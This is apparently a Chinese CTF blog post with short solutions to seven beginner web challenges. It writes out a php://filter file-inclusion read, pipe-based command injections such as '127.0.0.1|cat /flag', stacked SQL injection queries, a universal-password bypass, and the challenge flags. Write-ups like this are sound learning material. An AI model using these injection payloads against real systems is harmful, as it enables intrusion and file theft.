每天一道ctf

一.[HCTF 2018]WarmUp

 查看源码,发现有一个source.php文件

 查看此文件,出现一堆PHP代码

发现里面有一个hint.php文件,查看一下

文件里说明flag在ffffllllaaaagggg里 

 得到flag

flag{5e4b3989-5ece-406b-8c40-458c3939bd7c}

二.[极客大挑战 2019]EasySQL

直接万能密码

 flag{866282ef-8b72-408c-8f99-7bfbeb7de6f6}

三.[极客大挑战 2019]Havefun

查看源代码

有一个cat变量,通过get方式传参,如果cat=dog输出flag
使用构造payload:/?cat=dog

 flag{d486eb52-eb03-4550-8f80-4ac5fc2817b6}

四.[ACTF2020 新生赛]Include

点击链接

出现了flag.php文件,?file=flag.php 猜测文件包含漏洞

php://filter协议,用base64编码的方式来读文件flag.php;这时页面会显示出源文件flag.php经过base64编码后的内容,然后经过base64解码就可以看到flag;

 payload: /?file=php://filter/read=convert.base64-encode/resource=flag.php

得到base64编码后的内容为:

 解码

 flag{55fc10f5-9f6f-40ba-8cb5-1e0146b36084}

五.[ACTF2020 新生赛]Exec

需要了解的知识点
ls(英文全拼:list files):用于显示指定工作目录下的内容(列出目前工作目录所含之文件及子目录)

cat(英文全拼:concatenate):用于连接文件并打印到标准输出设备上。

查看此文件的目录:127.0.0.1|ls

只有一个index.php

查看上级目录127.0.0.1|ls /

 查看flag:127.0.0.1|cat /flag

flag{a978ed20-b4c2-446c-9755-8beb871cb5c8}

六[强网杯 2019]随便注

 

查询3时报错,说明有两个字段

然后想尝试联合查询
结果报错return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);
发现过滤了select|update|delete|drop|insert|where|\./i
爆数据库:1';show databases;#

爆表名:1'; show tables;#

出来两个表
1'; show columns from words;# 

1'; show columns from '1919810931114514';#
注意:表名为数字时,要用反引号包起来查询。

七. [SUCTF 2019]EasySQL

先判断一下是数字型还是字符型,输入1

试一下堆叠注入
爆出数据库:1;show databases;#

 爆表:1;show tables;#

 然后爆字段:1;show columns from FLAG;#,输入后回显Nonono.,猜测有被过滤

 直接构造payload为:*,1

 flag{3afd6880-acfb-41a5-9291-a532c250d013} 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值